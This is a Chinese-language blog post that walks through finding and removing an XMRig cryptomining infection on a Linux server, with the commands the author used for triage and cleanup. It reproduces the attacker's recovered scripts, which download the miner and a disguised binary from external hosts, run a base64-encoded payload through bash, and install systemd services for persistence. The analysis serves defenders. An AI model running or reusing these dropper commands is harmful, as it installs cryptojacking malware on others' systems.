Xmrig挖矿入侵服务器排查

已于 2024-04-05 20:23:49 修改
阅读量974 收藏 8
点赞数 7
文章标签: 服务器 chrome 运维
于 2024-03-19 22:48:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26624329/article/details/136857907
版权
本文详细描述了如何排查并处理服务器遭受XMrig挖矿软件的入侵,包括检查进程、网络连接、文件操作、服务管理以及识别和移除可疑的自启动脚本。
摘要由CSDN通过智能技术生成

Xmrig挖矿入侵服务器排查

type: Post
status: Published
date: 2024/03/19
slug: 240319-xmrig
tags: 建站, 开发, 推荐
category: 技术分享

契机

问题

Untitled

排查思路

#上去服务器先看看这个文件
ps aux | grep xmrig

Untitled

#排查下pid关联的文件 -> 没啥收获
ll /proc/{pid}/fd 
#查看网络链接,记住关键ip
netstat -tunap | grep {pid}
#kill再说
kill -9 {pid}
#然后全局查找文件(这里要记住文件大概什么时候创建的)
find / -name xmrig
#rm -rf xmrig相关
rm -rf {xxxx}
#检查下定时任务,该取消就取消
crontab -l
#再检查下xmrig相关后台程序 -> 我这里使用xmrig关键字没搜到
systemctl list-units --type=service  | grep xmrig

不出意外的话,5分钟后xmrig又被拉起来了,现在我们知道他有守护程序了。

#查询服务器网络链接,看起来可疑ip记录下pid
netstat -tunap 
#看看所有的程序
ps aux
#以上两个步骤我基本确定下面这个pid很可疑,在看下文件创建时间,与xmrig创建时间一致
/opt/sysetmd 9x25 481.x1.x1.4x
#依然看看关联文件->没收获
ll /proc/{pid}/fd 
#再kill掉
kill -9 {pid}
#删除文件sysetmd相关
rm -rf {xxxx}
#再去找自启动服务 这个确实找到了
systemctl list-units --type=service  | grep sysetmd

Untitled

#直接给他停掉
systemctl stop  sysetmd.service
systemctl disable sysetmd.service
rm -f /etc/systemd/system/sysetmd.service

额外收获,发现/etc/systemd/system下有个自启动的service名字和创建时间很可疑

Untitled

#cat查看下
cat monero.service

#文件内容如下,发现xmrig就是这个拉起来的
[Unit]
Description=Monero miner service node

[Service]
ExecStart=/root/xmrig-6.21.1/xmrig --donate-level 1 -o xxxxxxx
Restart=always

[Install]

#直接给他停掉
systemctl stop  monero.service
systemctl disable monero.service
rm /etc/systemd/system/monero.service

#然后持续观察以下内容
ps aux 
top -c
netstat -tunap

最后防止还有其他守护程序被拉起来,再看看对应时间点有哪些文件增加

#查找某个时间段的文件
#忽略/proc文件夹
find / -type d \( -path /proc -o -path /var/lib/docker -o -path /mnt/www/docker -o -path /usr/local/aegis  \) -prune -o -type f -newermt "2024-03-18 00:00:00" ! -newermt "2024-03-19 00:00:00" -print

Untitled

#找到wawa.sh和update_udp.sh很可疑

#wawa.sh如下
cd /root;
wget http://1187xxxxxom/xmrig-6.21.1-linux-static-x64.tar.gz;
tar -zxvf xmrig-6.21.1-linux-static-x64.tar.gz;
systemctl stop monero.service;
rm -rf /etc/systemd/system/monero.service;
wget http://xxxxon/monero.service;
sysctl -w vm.nr_hugepages=$((1168+$(nproc)));
mv monero.service /etc/systemd/system/monero.service;
systemctl daemon-reload;
systemctl enable monero.service;
systemctl start monero.service

#update_udp.sh如下
echo "xxxx==base64encodeexxxxxx"|base64 -di|bash -s
#base64解谜如下
curl -s http:/x7/libhv.so -o /opt/libhv.so;
cp /opt/libhv.so /usr/lib/libhv.so;
cp /opt/libhv.so /usr/lib64/libhv.so;
curl -s http://bpxysetmd -o /opt/sysetmd;
chmod 777 /opt/sysetmd;
curl -s http://bpgx27/sysetmd.service -o /etc/systemd/system/sysetmd.service;systemctl daemon-reload;
systemctl enable sysetmd.service;
systemctl start sysetmd.service;

发现和我清除的一致,再持续观察一段时间,还有这个人是真的蠢,为什么部署sh还要留下

总结

  • 找被黑时间左右的所有文件一个一个排查
  • 找文件关联pid
  • 找pid关联fd,端口,ip等
  • 找相关service,排查异常servcie,定时任务全部停止
  • 持续观察cpu,网络等信息

写到最后

  • https://bothsavage.github.io/

Untitled

BothSavage
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xm-ring-buffer.tar.gz_RINGBUFFER_XMRING_buffer_circlebuffer_wayr
09-15
一种轻量级的循环缓冲设计实现,可用于数据缓冲
记一次排查xmirg挖矿程序_xmirg 关闭,腾讯T3手把手教你
2401_84140140的博客
04-09 907
卧槽,真被盯上了,不要慌,我们先看看这个进程在哪里,我们通过以下命令查看进制的执行路径也可以直接查询当前文件根据查询出来的程序地址进入到当前的文件目录下面,然后直接把这个文件目录下的文件删除了,当然,一般他都会自行创建一个单独的文件存放这些东西,如果不是的话,如果自己不认识那些有用那些没用就上报此次挖矿程序,俗称:“自己搞不定,那就给能搞定的人去处理”,哈哈。如果是单独的文件的话,删除了然后kill掉这个进程你以为这就完了吗?当然没有,我们还要查看有没有自启动这个程序的,
菜鸟的linux云服务器第一次木马入侵处理记录(名为xmrigMiner的木马)
weixin_48713918的博客
04-01 2377
遇到木马入侵linux自查自删过程。 查了一下后台,是这个样子 显示的是cpu与内存占用极高,不停有写入操作大写的懵逼,第一反应是先关机 但是没屁用,cpu与内存占用居高不下 我处理的主要过程如下 kill进程没用,还会重新启动。查了半天资料,说是让我看看启用命令 卧槽,真的有 大概是我用的redis安装包有问题赶快启用删除全部定时任务命令 再次查询,就查不到这个定时任务了但是占用率还是居高不下,kill不掉用top命令查看进程状况 就是这个流氓程序,一直占着, 用kill命令,后面的2988
根除矿机病毒xmrig
最新发布
qq_19582693的博客
07-28 688
根除xmrig矿机病毒
最新挖矿病毒xmrig清除方法和原理
m0_73140589的博客
03-21 3459
手机端接收短信提醒,服务器正遭受挖矿病毒攻击,服务器的cpu和内存占用高,阿里云不断告警
记一次服务器挖矿排查过程:xmrig挖矿病毒
矮矮的夏祭的专栏
07-11 9608
服务器挖矿,记录一下清除xmrig挖矿病毒的解决过程
xmrig挖矿病毒彻底清除
mynameisjinxiaokai的博客
04-20 7117
1、通过top命令查看进程发现,占用CPU最大的进程是一个叫xmrig的进程。3、最后一定要修改机器密码,不然过几天还会存在。2、找到xmrig所在的文件并删除。记录下进程的PID,然后杀死进程。
服务器遭遇xmrig挖矿病毒
康小虎的博客
12-25 3475
发现问题: 在自己买的阿里云服务器上部署的项目之前就偶尔会自己kill掉,一直没有在意,重启项目后继续使用。但是昨天重启后一直被kill掉,根本没法正常启动,用top命令看了一下,发现一个奇怪的进程一直占用CPU在50%左右,然后去阿里云控制台看了一下,最近一个月CPU使用率几乎都接近100%。最后上网查了一下,xmrig是一款挖矿病毒 解决问题: 百度了一下暂时解决了,基本跟阿里给的方案一样。直接看看阿里售后的说法: 1、首先看一下为什么阿里云没有安全提示 ![在这里插入图片描述](https:/
linux服务器彻底清除xmrig挖矿病毒
暴走地水牛的博客
06-02 4002
在linux服务器上彻底清除xmrig挖矿病毒
服务器入侵痕迹排查.pdf
08-25
服务器入侵痕迹排查是指在服务器入侵后,通过对服务器日志、系统文件和进程的分析,追踪入侵者的痕迹,找出入侵者的行为痕迹和潜在的安全隐患。以下是服务器入侵痕迹排查的相关知识点: 一、查看服务器日志 * ...
Linux入侵排查.docx
05-07
Linux 入侵排查 Linux 入侵排查是指在 Linux 系统中检测和处理黑客入侵、系统崩溃或其他影响业务正常运行的安全事件的过程。快速响应和处理这些事件对于保护企业的网络信息系统和减少经济损失至关重要。 0x00 前言...
Linux操作系统安全及入侵排查
09-30
课程还介绍了针对系统入侵的应急排查步骤和要求,主要涉及的排查内容包括:检查系统日志及命令记录 、检查账户、检查文件、检查系统启动项和计划任务、检查进程和网络连接、检查是否存留后门等恶意程序,根据上述...
【应急响应】Linux入侵排查思路
09-18
【应急响应】Linux入侵排查思路: 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第...针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。
linux入侵排查(操作截图).docx
07-10
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为...
Xmrig挖矿木马排查过程,xmrig占用大量CPU
cf
12-10 4192
4.查找find / -name xmrig 文件,或者程序信息 ps -aux | grep xmrig,找到安装目录并将其删除 rm -rf /root/5.删除定时任务 rm -rf /var/spool/cron。6.删除ssh认证信息 rm -rf ./ssh/8.尽量使用内网链接,不要暴露端口号或者外网地址。1.通过top发现xmrig占用了大量cpu。3.尝试直接kill发现杀死之后又会自动重启。7.原因,有可能是redis等程序导致,2.通过网上搜索发现是挖矿木马。
服务器中了 xmrig 挖矿病毒,杀掉进程后又再次出来进程的解决方法
qq_38398347的博客
02-09 3318
通过网络地址查看下载的 shell 脚本,会发现脚本会将病毒文件拉到 c3pool 中执行,然后会删除 c3pool 目录。我尝试直接通过 kill -9 pid 将进程杀掉后,第二天发现又有了,然后想到了这个病毒应该是通过定时任务在执行。这条定时任务每隔23小时就要执行个 shell 脚本,通过路径找到 shell 脚本文件。通过搜索发现 mxrig 是个挖矿病毒,然后就开始查找解决此病毒的方法。所以,我们将病毒进程杀掉后,再将定时任务删除就行了。打开 cron 目录中的文件后,发现了一条定时任务。
服务器被植入挖矿病毒-xmrig
weixin_53299145的博客
09-24 1921
今天早晨登录宝塔面板发现服务器CPU占用率和内存都爆满了,赶紧检查一下服务器的进程使用top命令查看服务器的cpu和内存占用情况。
linux服务器挖矿程序xmrig入侵以及解决方案
热门推荐
weixin_46575363的博客
09-03 1万+
记一次Xmrig挖矿木马排查过程 2021年9月2日晚上,突然收到阿里云的一条短信,说是服务器挖矿软件入侵了,马上打开电脑查看 控制台CPU占用 原因分析与解决方案 寻找原因 查找挖矿进程 top -H 从图上我们可以找到CPU占用100%的进行名为xmrig(甚至都不伪装一下进程名) 查找挖矿程序文件位置 root@xxx:/# find / -name ‘xmrig’ /root/.c3pool/xmrig --config=/root/.c3pool/config.json 我们尝试kill掉
Linux服务器xmrig病毒处理
weixin_44254869的博客
08-31 1976
第一次处理挖矿程序,针对以上问题,还是备份数据 格式化服务器吧,毕竟咱也不是专业的运维
【转】服务器挖矿病毒的排查过程
05-25
服务器挖矿病毒是指黑客通过入侵服务器,利用服务器的计算资源进行加密货币挖矿。这种病毒的存在会导致服务器性能下降,甚至导致服务器崩溃。以下是排查服务器挖矿病毒的过程。 1. 检查CPU和内存使用率 服务器挖矿病毒会占用服务器的大量计算资源,导致CPU和内存使用率异常升高。通过检查系统监视器或者运行top命令,可以查看当前的CPU和内存使用率,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 2. 检查网络流量 服务器挖矿病毒需要与矿池进行通信,因此会产生大量的网络流量。通过检查网络监视器或者运行iftop命令,可以查看当前的网络流量,如果发现异常升高,则很可能是服务器挖矿病毒导致的。 3. 检查进程列表 服务器挖矿病毒会在服务器上运行挖矿程序,因此会在进程列表中留下痕迹。通过运行ps命令,可以查看当前的进程列表,如果发现有可疑的进程,则很可能是服务器挖矿病毒导致的。 4. 检查系统日志 服务器挖矿病毒会在服务器上留下痕迹,因此可以通过检查系统日志来发现异常行为。通过查看/var/log/auth.log、/var/log/syslog等系统日志文件,可以查找异常登录或者异常命令执行的记录,如果发现可疑行为,则很可能是服务器挖矿病毒导致的。 5. 检查防火墙日志 服务器挖矿病毒需要与矿池进行通信,因此需要打开服务器的防火墙端口。通过检查防火墙日志,可以查看服务器上的网络连接情况,如果发现与矿池的连接,则很可能是服务器挖矿病毒导致的。 以上是排查服务器挖矿病毒的基本过程,如果发现服务器确实感染了挖矿病毒,则需要及时采取措施清除病毒,并加强服务器的安全防护措施,避免类似的攻击再次发生。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值